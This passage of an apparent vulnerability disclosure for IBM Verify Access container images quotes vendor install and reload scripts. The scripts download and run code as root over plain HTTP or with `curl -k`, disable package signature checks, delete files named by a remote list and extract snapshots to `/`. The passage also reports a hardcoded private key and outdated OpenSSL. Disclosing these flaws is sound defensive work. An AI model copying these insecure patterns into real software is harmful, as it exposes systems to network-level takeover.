110 com.ibm.isam.common.eclipse.wlp.zip:/opt/IBM \
111 pdjrte-0.0.0-0.zip:/opt"
112
113 for entry in $zips; do
114 zip=`echo $entry | cut -f 1 -d ':'`
115 dst=`echo $entry | cut -f 2 -d ':'`
116
117 curl --fail -s -k ${WEBSERVER}/$zip -o /root/$zip
118 mkdir -p $dst
119 unzip -q /root/$zip -d $dst
120
121 rm -f /root/$zip
122 done
[/code]


## Details - Remote Code Execution due to insecure download of zip files in verify-access-runtime (/usr/sbin/install_java_liberty.sh)

It was observed that the Docker image verify-access-runtime insecurely downloads zip files.

An attacker located on the network can inject malicious zip files into the platform and take control over the entire platform.

The `/usr/sbin/install_java_liberty.sh` script contains insecure downloading of zip files. These zip files will then be extracted as root into the `/opt/java`, `/opt/ibm`, `/opt/oracle/jdbc` and `/opt/IBM/db2` directories, providing WebSphere Liberty binaries (that will then be used to provide executable code).

It is also possible to remotely delete any file as root (lines 61 to 65).

Vulnerable code in `/usr/sbin/install_java_liberty.sh`:

[code:shell]
14 web_files=/root/files.txt
15
16 locate_file()
17 {
18 grep "$1" $web_files | cut -f 2 -d '"'
19 }
20 curl -k ${WEBSERVER}/ -o $web_files
21
[...]
29 #
30 # Install each of our zip files.
31 #
32
33 zips="\
34 ibm-semeru-open-jre_x64_linux_11.*.tar.gz:/opt/java \
35 liberty.*.zip:/opt/ibm \
36 oracle_jdbc_.*.zip:/opt/oracle/jdbc \
37 ibm-db2-jdbc.*.tar.gz:/opt/IBM/db2"
38
39 for entry in $zips; do
40 zip=`echo $entry | cut -f 1 -d ':'`
41 dst=`echo $entry | cut -f 2 -d ':'`
42
43 # Download and install the file.
44 zip_file=`locate_file $zip`
45
46 curl --fail -s -k ${WEBSERVER}/$zip_file -o /root/$zip_file
47
48 mkdir -p $dst
49
50 set +e; echo $zip | grep -q .zip; rc=$?; set -e
51 if [ $rc -eq 0 ] ; then
52 unzip -q /root/$zip_file -d $dst
53 exclude=`echo $zip_file | sed "s|.zip|.exclude|g"`
54 else
55 tar -x -C $dst -f /root/$zip_file
56 exclude=`echo $zip_file | sed "s|.tar.gz|.exclude|g"`
57 fi
58
59 exclude_file=/root/$exclude
60
61 set +e; curl --fail -s -k ${WEBSERVER}/$exclude -o $exclude_file; rc=$?; set -e
62
63 if [ $rc -eq 0 -a -s $exclude_file ] ; then
64 cd $dst
65 cat $exclude_file | xargs rm -rf
66 fi
[/code]


## Details - Remote Code Execution due to insecure Repository configuration

It was observed that the Docker images verify-access-dsc, verify-access-runtime and verify-access-wrp use insecure CentOS repositories:

- The transport is done over HTTP (in clear-text) instead of HTTPS.
- Signature checking is disabled.
- These repositories are enabled by default.

An attacker located on the network (local network, or any Internet router located between the instance and the remote mirror.centos.org server) can inject malicious RPMs and take control over the entire platform.
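For comparison, a hardened variant of the same repository definition would use an HTTPS mirror and leave GPG verification on. This is an illustrative sketch only; the mirror URL and GPG key path are assumptions and the file is written to a temporary location rather than `/etc/yum.repos.d`:

```shell
# Illustrative hardened repo definition: HTTPS transport plus GPG
# signature checking, in contrast to the http:// + gpgcheck=0 config
# found in the images. Written to a temp file for demonstration.
repo_file=$(mktemp /tmp/centos.repo.XXXXXX)

cat <<'EOT' > "$repo_file"
[CentOS-8_base]
name = CentOS-8 - Base
baseurl = https://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
gpgcheck = 1
gpgkey = file:///etc/pki/rpm-gpg/RPM-GPG-KEY-centosofficial
enabled = 1
EOT
```

With `gpgcheck = 1`, dnf/microdnf refuses unsigned or tampered packages even if the transport itself is compromised, so HTTPS and signature checking protect against different failure modes and both belong in the configuration.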

The `/usr/sbin/install_system.sh` script in these 3 images enables 4 remote repositories (the two CentOS repositories over plain HTTP) and disables signature checking for the packages downloaded from all of them:

 31 centos_repo_file="/etc/yum.repos.d/centos.repo"
 32
 33 cat <<EOT >> $centos_repo_file
 34 [CentOS-8_base]
 35 name = CentOS-8 - Base
 36 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
 37 gpgcheck = 0
 38 enabled = 1
 39
 40 [CentOS-8_appstream]
 41 name = CentOS-8 - AppStream
 42 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
 43 gpgcheck = 0
 44 enabled = 1
 45 EOT
 [...]
 98 #
 99 # Enable install of the busybox RPM from the Fedora repository.
 100 #
 101
 102 fedora_repo_file="/etc/yum.repos.d/fedora.repo"
 103
 104 cat <<EOT >> $fedora_repo_file
 105 [fedora]
 106 name=Fedora
 107 metalink=https://mirrors.fedoraproject.org/metalink?repo=fedora-33&arch=x86_64
 108 enabled=1
 109 gpgcheck=0
 110
 111 [fedora-updates]
 112 name=Fedora Updates
 113 metalink=https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33&arch=x86_64
 114 enabled=1
 115 gpgcheck=0
 116 EOT

It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:

 [root@container-01]# for i in $(podman ps | grep -v NAMES | awk '{ print $1 }'); do podman ps | grep $i; podman exec -it $i cat /etc/yum.repos.d/centos.repo;echo;done
 4262005f3646 ibmcom/verify-access/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:7443->9443/tcp verify-access
 cat: /etc/yum.repos.d/centos.repo: No such file or directory

 c930c46acd66 ibmcom/verify-access-runtime/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:9443->9443/tcp verify-access-runtime
 name = CentOS-8 - Base
 baseurl = http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os
 gpgcheck = 0
 enabled = 1

 [CentOS-8_appstream]
 name = CentOS-8 - AppStream
 baseurl = http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os
 gpgcheck = 0
 enabled = 1

 48f1b1e8f782 ibmcom/verify-access-dsc/10.0.4.0:20221006.1 7 hours ago Up 7 hours ago (healthy) 0.0.0.0:8443-8444->8443-8444/tcp verify-access-dsc
 cat: /etc/yum.repos.d/centos.repo: No such file or directory

 [root@container-01]#

Furthermore, the script `/usr/sbin/install_system.sh` insecurely downloads programs and installs them as root, using the insecure repositories above:

[code:shell]
 48 # Install tools required for container build process.
 49 #
 50
 51 microdnf -y install unzip shadow-utils jansson openssl libxslt \
 52 libnsl2 gzip cpio tar
[...]
 55 # We have an issue where RedHat periodically introduces a dependency on
 56 # openssl-pkcs11. We don't actually need this package and so we manually remove
 57 # it if it has been installed.
 58 #
 59
 60 if [ `rpm -q -a | grep openssl-pkcs11 | wc -l` -ne 0 ] ; then
 61 rpm --erase openssl-pkcs11
 62 fi
[...]
 70 rpms=""
 71 for lang in en cs de es fi fr hu it ja ko nl pl pt ru zh; do
 72 rpms="$rpms glibc-langpack-$lang"
 73 done
[...]
122 microdnf -y install busybox
[/code]


## Details - Additional repository configuration (potential supply-chain attack)

It was observed that the Docker images verify-access-runtime and verify-access-wrp use a third-party repository configuration, obtained by retrieving the external file at `https://repo.symas.com/configs/SOFL/rhel8/sofl.repo`:

Content of `/usr/sbin/install_system.sh`:

[code:shell]
47 #
48 # Install OpenLDAP. This is no longer provided by CentOS.
49 #
50
51 sofl_repo_file="/etc/yum.repos.d/sofl.repo"
52
53 curl https://repo.symas.com/configs/SOFL/rhel8/sofl.repo \
54 -o $sofl_repo_file
[/code]

It was confirmed that this configuration appears in the verify-access-runtime instance in the live system:

 [isam@verify-access-runtime /]$ cat /etc/yum.repos.d/sofl.repo
 [sofl]
 name=Symas OpenLDAP for Linux RPM repository
 baseurl=https://repo.symas.com/repo/rpm/SOFL/rhel8
 gpgkey=https://repo.symas.com/repo/gpg/RPM-GPG-KEY-symas-com-signing-key
 gpgcheck=1
 enabled=1
 [isam@verify-access-runtime /]$

Reading the `/usr/sbin/install_system.sh` script further, this repository is used to install an additional package without checking its signature:

[code:shell]
58 #
59 # We want to manually install the openldap server RPM as microdnf pulls
60 # in a whole heap of dependencies which we don't require.
61 #
62
63 baseurl=`grep baseurl $sofl_repo_file | cut -f 2 -d '='`/x86_64
64 version=`rpm -q --qf "%{VERSION}-%{RELEASE}" symas-openldap`
65 rpmfile=/tmp/openldap.rpm
66
67 curl $baseurl/symas-openldap-servers-$version.x86_64.rpm -o $rpmfile
68
69 rpm -i --nodeps $rpmfile
70
71 rm -f $rpmfile
[/code]

This creates a potential supply-chain attack vector, and the dependency is not documented.


## Details - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime

It was observed that the Docker image verify-access-runtime uses a highly insecure `/usr/sbin/install_system.sh` script.
\n\nWith the 2 previous vulnerabilities already explained in Additional repository configuration (potential supply-chain attack) and\nRemote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh),\nthis version adds 2 new vulnerabilities:\n\n- - Installation of 3 packages downloaded over HTTP without checking the signature (lines 82, 84 and 90); and\n- - Replacement of `/usr/share/java/postgresql-jdbc/postgresql.jar` using a postgresql.jar file directly retrieved over HTTP (line 99) and with `-k` (aka `--insecure`). \n\nContent of `/usr/sbin/install_system.sh`:\n\n[code:shell]\n73 #\n74 # For the postgresql packages we need to download and install manually so\n75 # that we don\u0027t also pull in all of the unnecessary dependencies. \n76 #\n77 \n78 centos_base=http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/\n79 \n80 rpms=/tmp/rpms.txt\n81 \n82 curl http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/Packages/ -o $rpms\n83 \n84 for pkg in postgresql-12 postgresql-server-12 postgresql-jdbc-42; do\n85 rpm_file=`grep $pkg $rpms | tail -n 1 | \\\n86 sed \u0027s|.*href=\"||g\u0027 | cut -f 1 -d \u0027\"\u0027`\n87 \n88 echo \"Installing: $rpm_file\"\n89 \n90 rpm -i --nodeps $centos_base/$rpm_file\n91 done\n92 \n93 rm -f $rpms\n94 \n95 #\n96 # Need a more current jar then what is part of the postges-jdbc rpm\n97 #\n98 postgres_jar=`locate_file postgresql-.*.jar`\n99 curl -kv ${WEBSERVER}/$postgres_jar -o /usr/share/java/postgresql-jdbc/postgresql.jar\n[/code]\n\nAn attacker located on the network (local network or any Internet router located between the instance and the remote mirror.centos.org server) can inject a malicious RPM or a malicious .jar file and take control over the entire platform. \n\nNote that IBM does not consider this a vulnerability, since the script is supposed to be executed in a secure network. 
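Instead of `curl -kv`, the jar could be fetched with TLS validation left on and an out-of-band checksum check. This is a minimal sketch; the `fetch_verified` helper and the `file://` demonstration are illustrative, not part of the IBM scripts:

```shell
# Download a file and refuse to keep it unless its SHA-256 matches a
# value obtained through a trusted channel (helper name is hypothetical).
fetch_verified() {
    url=$1; dst=$2; expected=$3
    curl -s --fail "$url" -o "$dst" || return 1
    # sha256sum -c expects "HASH  FILE" (two spaces) on stdin
    echo "$expected  $dst" | sha256sum -c --quiet || { rm -f "$dst"; return 1; }
}

# Local demonstration with a file:// URL standing in for ${WEBSERVER}:
src=$(mktemp)
echo "demo-jar-content" > "$src"
expected_hash=$(sha256sum "$src" | cut -f 1 -d ' ')
fetch_verified "file://$src" "$src.verified" "$expected_hash"
```

Pinning a checksum shifts trust from the transport (and its certificate validation) to the integrity of the published hash, which defeats both the HTTP mirror injection and the `-k` MITM described above.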
\n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-runtime:\n\n[code:shell]\n239 #\n240 # Ensure that the reload script is executable. \n241 #\n242 \n243 mv /sbin/reload.sh /sbin/runtime_reload\n244 \n245 chmod 755 /sbin/runtime_reload\n[/code]\n\nAnalysis of `/sbin/runtime_reload`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (as known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. \n\nWe can also see that Postgres does not have passwords in line 144, already found in [Lack of authentication in Postgres inside verify-access-runtime](#no-auth-postgres). \n\n\n\n[code:shell]\n 67 #############################################################################\n 68 # Attempt to download the snapshot from the configuration service. \n 69 \n 70 download_from_cfgsvc()\n 71 {\n 72 # No need to download the snapshot if the configuration service has not\n 73 # been defined. \n 74 if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 75 return\n 76 fi\n 77 \n 78 if [ $1 -eq 1 ] ; then\n 79 Echo 960\n 80 fi\n 81 \n 82 curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n 83 \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n 84 -o $snapshot\n 85 \n 86 if [ $? 
-ne 0 ] ; then\n 87 if [ $1 -eq 1 ] ; then\n 88 Echo 961\n 89 fi\n 90 \n 91 rm -f $snapshot\n 92 else\n 93 Echo 962\n 94 fi\n 95 }\n[...]\n 97 #############################################################################\n 98 # Main line. \n 99 \n100 #\n101 # Download the snapshot file. \n102 #\n103 \n104 download_from_cfgsvc 1\n[...]\n127 #\n128 # Update the configuration database. \n129 #\n130 \n131 Echo 997\n132 \n133 db_root=/var/postgresql/config\n134 db_snapshot=$db_root/snapshot.sql\n135 db_port=5432\n136 db_name=config\n137 db_user=www-data\n138 \n139 if [ ! -f $db_snapshot ] ; then\n140 Echo 975\n141 exit 1\n142 fi\n143 \n144 psql -U $db_user -d $db_name -p $db_port -f $db_snapshot -q -b -w\n\n[/code]\n\n\n\n## Details - Remote Code Execution due to insecure reload script in verify-access-wrp\n\nIt was observed that the Docker image verify-access-wrp uses a highly insecure reload script. \n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. The attacker can also overwrite any file present in the verify-access-wrp Docker instance (achieving Remote Code Execution). \n\nThis script is defined at the end of the `/usr/sbin/install_system.sh` script: \n\nContent of `/usr/sbin/install_system.sh` in verify-access-wrp:\n\n[code:shell]\n210 #\n211 # Ensure that the restart script is executable. \n212 #\n213 \n214 mv /sbin/restart.sh /sbin/wrprestart\n215 \n216 chmod 755 /sbin/wrprestart\n[/code]\n\nAnalysis of `/sbin/wrprestart`:\n\nThe function `download_from_cfgsvc()` is insecure as the curl command uses the `-k` option (also known as `--insecure`) to download and install a snapshot into the instance: any invalid SSL certificate for the remote server will be accepted because of the `-k` option. 
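A corrected variant of `download_from_cfgsvc()` would drop `-k` and pin the configuration service's CA. The sketch below keeps the original function's structure; the `CONFIG_SERVICE_CA_FILE` variable and the fallback bundle path are assumptions, not part of the original script:

```shell
# Same logic as the original function, but TLS validation stays enabled
# and the server certificate is checked against a pinned CA bundle.
download_from_cfgsvc_secure() {
    # No need to download the snapshot if the configuration service has
    # not been defined (mirrors the original early return).
    if [ -z "$CONFIG_SERVICE_URL" ] ; then
        return 0
    fi

    curl -s --fail \
         --cacert "${CONFIG_SERVICE_CA_FILE:-/etc/ssl/certs/ca-certificates.crt}" \
         -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \
         "$CONFIG_SERVICE_URL/snapshots/$(basename "$snapshot")?type=File" \
         -o "$snapshot"
}
```

With `--cacert` pointing at the CA that actually signed the configuration service's certificate, an on-path attacker can no longer substitute the snapshot by presenting an arbitrary self-signed certificate.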
\n\nThe `openldap.zip` file found in the malicious snapshot file will then be decrypted using a previously found hardcoded key and extracted into the `/` directory (line 154 and 156) and openldap will be restarted with the new configuration file, allowing an attacker to get a Remote Code Execution by specifying a malicious `slapd.conf` file (stored inside `openldap.zip`, in `etc/openldap/slapd.conf`). \n\nSince the extraction of `openldap.zip` takes place in `/`, it is also possible to overwrite any file as root (and get Remote Code Execution, e.g. by replacing a program). \n\n[code:shell]\n 85 #############################################################################\n 86 # Attempt to download the snapshot from the configuration service. \n 87 \n 88 download_from_cfgsvc()\n 89 {\n 90 # No need to download the snapshot if the configuration service has not\n 91 # been defined. \n 92 if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n 93 return\n 94 fi\n 95 \n 96 if [ $1 -eq 1 ] ; then\n 97 Echo 960\n 98 fi\n 99 \n100 curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n101 \"$CONFIG_SERVICE_URL/snapshots/`basename $snapshot`?type=File\" \\\n102 -o $snapshot\n103 \n104 if [ $? -ne 0 ] ; then \n105 if [ $1 -eq 1 ] ; then \n106 Echo 961 \n107 fi\n108 \n109 rm -f $snapshot\n110 else\n111 Echo 962\n112 fi\n113 }\n[...]\n137 #############################################################################\n138 # Process the OpenLDAP configuration and then restart the OpenLDAP server. \n139 \n140 restart_openldap_server()\n141 {\n142 # Check to see whether the embedded LDAP server has been enabled or\n143 # not. \n144 ldap_conf=\"/var/PolicyDirector/etc/ldap.conf\"\n145 ldap_host=`$pdconf -f $ldap_conf getentry ldap host`\n146 \n147 if [ \"$ldap_host\" != \"127.0.0.1\" ] ; then\n148 return\n149 fi\n150 \n151 Echo 964\n152 \n153 # Decrypt and extract the LDAP configuration. 
\n154 isva_decrypt $snapshot_tmp_dir/openldap.zip\n155 \n156 unzip -q -o $snapshot_tmp_dir/openldap.zip -d /\n157 \n158 # Change the LDAP port from 389 to 6389 (389 is a privileged port). \n159 $pdconf -f $ldap_conf setentry ldap port 6389\n160 \n161 # Stop the LDAP server. \n162 busybox killall -SIGHUP slapd\n163 \n164 while $(busybox killall -0 slapd 2\u003e/dev/null); do\n165 sleep 1\n166 done\n167 \n168 # Start the LDAP server. \n169 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n170 }\n[...]\n260 #############################################################################\n261 # Main line. \n262 \n263 #\n264 # Attempt to download the configuration data from the configuration service. \n265 #\n266 \n267 #\n268 # Wait for the snapshot file. \n269 #\n270 \n271 download_from_cfgsvc 1\n[...]\n305 #\n306 # Restart the OpenLDAP server. \n307 #\n308 \n309 restart_openldap_server\n[/code]\n\n\n\n## Details - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n\nIt was observed that the ibmcom/verify-access Docker image contains a hardcoded private key used by the license client iss-lum:\n\n kali-docker# pwd \n /home/user/ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/etc/lum\n \n kali-docker# ls -al \n total 492 \n drwxr-xr-x 2 root root 4096 Jun 8 01:43 . \n drwxr-xr-x 25 root root 4096 Jun 8 04:09 .. 
\n -rwxr-xr-x 1 root root 1296 Oct 20 2016 externalTrustSettings.xml\n -rwxr-xr-x 1 root root 445080 Oct 20 2016 iss-external.kdb\n -rwxr-xr-x 1 root root 129 Oct 20 2016 iss-external.sth\n -rwxr-xr-x 1 root root 100 Oct 20 2016 iss-lum.conf\n -rwxr-xr-x 1 root root 3649 Oct 20 2016 isslum-usLocalSettings.xml\n -rwxr-xr-x 1 root root 725 Oct 20 2016 lum_triggers.conf\n -rwxr-xr-x 1 root root 1858 Oct 20 2016 private.pem\n -rwxr-xr-x 1 root root 451 Oct 20 2016 public.pem\n -rwxr-xr-x 1 root root 3926 Oct 20 2016 .udrc\n -rwxr-xr-x 1 root root 806 Oct 20 2016 update-settings.conf\n -rwxr-xr-x 1 root root 7352 Oct 20 2016 update-status.xsd\n -rwxr-xr-x 1 root root 561 Jun 8 01:32 UpdateTypeNames.config\n -rwxr-xr-x 1 root root 0 Dec 31 1969 .wh..wh..opq\n\n kali-docker# sha256sum private.pem public.pem\n e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d private.pem\n 3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20 public.pem\n\nWhen analyzing the podman instance verify-access, we can confirm the key has not been updated:\n\n [isam@verify-access lum]$ sha256sum private.pem public.pem\n e1ecbd519ef838861cb0fe5e5daad88f90b9b2c154a936daf7f08855039b0c1d private.pem\n 3a6bbfef0af62c277cbe7b7fbc061b6a11b01e9ff61bba7bfe7edcaaeae3cd20 public.pem\n [isam@verify-access lum]$\n\nThe private key appears to be used by several programs:\n\n- - /opt/dca/bin/dcatool\n- - /usr/bin/isslum-modstatus\n- - /usr/sbin/iss-lum\n- - /usr/sbin/mesa_config\n- - /usr/sbin/mesa_eventsd\n- - /usr/sbin/isslum-installer\n\n\nThe license client is using outdated code and may contain vulnerabilities. \n\nThe keys are hardcoded and have not been updated for 6 years, which raises the question of how the license client is being maintained. 
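Comparing raw file hashes, as above, already proves the key is shared across installs; the same conclusion can be reached even on re-encoded PEM files by comparing RSA public moduli. A small sketch, using a locally generated key as a stand-in for `/etc/lum/private.pem`:

```shell
# Two deployments share key material iff their RSA moduli match,
# regardless of how the PEM file is encoded or commented.
key_a=$(mktemp) ; key_b=$(mktemp)
openssl genrsa -out "$key_a" 2048 2>/dev/null
cp "$key_a" "$key_b"   # simulate the same key shipped in two images

modulus_fp() {
    openssl rsa -in "$1" -noout -modulus | sha256sum | cut -f 1 -d ' '
}

if [ "$(modulus_fp "$key_a")" = "$(modulus_fp "$key_b")" ] ; then
    echo "identical key material"
fi
```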
\n\n\n\n## Details - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n\nIt was observed that the `dcatool` program located in `/opt/dca/bin` is linked with an outdated OpenSSL library located in the non-standard directory `/opt/dca/lib`:\n\n- From a live system:\n\n [isam@verify-access bin]$ pwd\n /opt/dca/bin\n [isam@verify-access bin]$ ls -la\n total 580\n drwxr-xr-x 2 root root 4096 Jun 8 13:43 . \n drwxr-xr-x 4 root root 4096 Jun 8 13:43 .. \n -rwxr-xr-x 1 root root 373208 Jun 8 13:31 dcatool\n -rwxr-xr-x 1 root root 207872 Jun 8 13:31 dcaupdate\n [isam@verify-access bin]$ ldd dcatool | grep ssl\n libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fafcfb1e000)\n libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fafcda45000)\n [isam@verify-access bin]$ ldd dcaupdate | grep ssl\n libssl.so.10 =\u003e /opt/dca/lib/libssl.so.10 (0x00007fe04980d000)\n libssl.so.1.1 =\u003e /lib64/libssl.so.1.1 (0x00007fe047734000)\n\nAnalysis of the library:\n\n [isam@verify-access lib]$ pwd\n /opt/dca/lib\n [isam@verify-access lib]$ ls -la\n total 4156\n drwxr-xr-x 2 root root 4096 Jun 8 13:43 . \n drwxr-xr-x 4 root root 4096 Jun 8 13:43 .. 
\n -rwxr-xr-x 1 root root 1252080 Jun 8 13:31 libboost_regex.so.1.53.0\n -rwxr-xr-x 1 root root 2521496 Jun 8 13:31 libcrypto.so.10\n lrwxrwxrwx 1 root root 24 Jun 8 13:43 libicudata.so.54 -\u003e /usr/lib64/libicudata.so\n lrwxrwxrwx 1 root root 24 Jun 8 13:43 libicui18n.so.54 -\u003e /usr/lib64/libicui18n.so\n lrwxrwxrwx 1 root root 22 Jun 8 13:43 libicuuc.so.54 -\u003e /usr/lib64/libicuuc.so\n -rwxr-xr-x 1 root root 470328 Jun 8 13:31 libssl.so.10\n [isam@verify-access lib]$ sha256sum *so*\n a4b9594f78c0e5cfa14c171e07ae439dccd0ef990db8c4b155c68fde43a8d9a9 libboost_regex.so.1.53.0\n 8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c libcrypto.so.10\n 07796e84fc3618a64259cfff7a896e57fc90f6b270d690d953f4792c2b7e21ac libicudata.so.54\n 49e6f6b12d118118c7d17cec26f80c81b39c89ea01a30eaf26abb07859d909fe libicui18n.so.54\n 1504c73f432bc24414c0ca69d29bdb04c04ba2269b752c320306cb25aadd5972 libicuuc.so.54\n 523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0 libssl.so.10\n [isam@verify-access lib]$\n\nWe can retrieve these 2 libraries inside the `ibmcom/verify-access` image and identify the version of OpenSSL:\n\n kali-docker# sha256sum **/libssl.so.10 \n 523ad80dd3cd9afe19bbb83eb22b11ba43b0dc907a3893a38569023ef7b382f0 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10\n kali-docker# sha256sum **/libcrypto.so.10 \n 8db48d5bcf1ddf6a8a4033de04827288b33af36d246c73ba46041365a61c697c 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10\n \n kali-docker# kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libcrypto.so.10|grep -i openssl\n [...][\n OpenSSL 1.0.2k-fips 26 Jan 2017\n [...]\n kali-docker# strings 698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/opt/dca/lib/libssl.so.10|grep -i openssl\n OpenSSL 1.0.2k-fips 26 Jan 2017\n [...]\n\nThe libraries located in `/opt/dca/lib` are completely outdated and are 
vulnerable to known CVEs. \n\nThese libraries are likely used by IBM-specific programs. \n\nThe Docker images contain known vulnerabilities. \n\n\n\n## Details - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n\nIt was observed that the `/usr/sbin/iss-lum` program from the verify-access Docker image contains outdated OpenSSL code (from the library 0.9.7) from 2007. The iss-lum program is the license client that will connect to external servers. \n\nThis program runs inside the instance:\n\n [isam@verify-access /]$ ps -auxw\n USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n isam 1 0.0 0.0 12060 132 ? Ss Oct04 0:00 /bin/sh /sbin/bootstrap.sh\n isam 313 0.0 0.0 24532 68 ? Ss Oct04 0:00 /usr/sbin/mesa_crashd\n isam 315 0.1 0.0 24532 1032 ? S Oct04 1:57 /usr/sbin/mesa_crashd\n isam 319 0.0 0.0 69160 144 ? Ss Oct04 0:00 /usr/sbin/mesa_syslogd\n isam 321 0.0 0.0 69224 1280 ? S Oct04 0:00 /usr/sbin/mesa_syslogd\n isam 400 0.0 0.0 102760 200 ? Ss Oct04 0:00 /usr/sbin/mesa_eventsd -m 1000\n isam 401 0.0 0.0 710856 316 ? Sl Oct04 0:00 /usr/sbin/mesa_eventsd -m 1000\n pgresql 435 0.0 0.0 188380 7016 ? Ss Oct04 0:02 /usr/bin/postgres -D /var/postgresql/config/data\n pgresql 436 0.0 0.0 138892 184 ? Ss Oct04 0:00 postgres: logger \n pgresql 447 0.0 0.0 188380 1600 ? Ss Oct04 0:00 postgres: checkpointer \n pgresql 448 0.0 0.0 188516 1288 ? Ss Oct04 0:01 postgres: background writer \n pgresql 449 0.0 0.0 188380 1468 ? Ss Oct04 0:01 postgres: walwriter \n pgresql 450 0.0 0.0 189112 1864 ? Ss Oct04 0:01 postgres: autovacuum launcher \n pgresql 451 0.0 0.0 139024 588 ? Ss Oct04 0:05 postgres: stats collector \n pgresql 452 0.0 0.0 188916 1016 ? Ss Oct04 0:00 postgres: logical replication launcher \n www-data 548 0.4 4.8 4920352 387128 ? 
SLl Oct04 7:53 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/default/java.security -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/lmi -Xbootclasspath/a:/opt/pdjrte/java/export/rgy/com.tivoli.pd.rgy.jar:/opt/ibm/wlp/usr/servers/runtime/lib/global/xercesImpl.jar -Dorg.osgi.framework.system.packages.extra=com.tivoli.pd.rgy,com.tivoli.pd.rgy.authz,com.tivoli.pd.rgy.exception,com.tivoli.pd.rgy.ldap,com.tivoli.pd.rgy.nls,com.tivoli.pd.rgy.util,com.ibm.misc,com.ibm.net.ssl.www2.protocol.https,com.sun.jndi.ldap,org.apache.xml.serialize -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 --add-exports java.base/sun.security.action=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util.concurrent=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED --add-opens java.naming/javax.naming.spi=ALL-UNNAMED --add-opens jdk.naming.rmi/com.sun.jndi.url.rmi=ALL-UNNAMED --add-opens java.naming/javax.naming=ALL-UNNAMED --add-opens java.rmi/java.rmi=ALL-UNNAMED --add-opens java.sql/java.sql=ALL-UNNAMED --add-opens java.management/javax.management=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.desktop/java.awt.image=ALL-UNNAMED --add-opens java.base/java.security=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED -jar /opt/IBM/wlp/bin/tools/ws-server.jar default --clean\n isam 748 0.0 0.0 270992 8 ? 
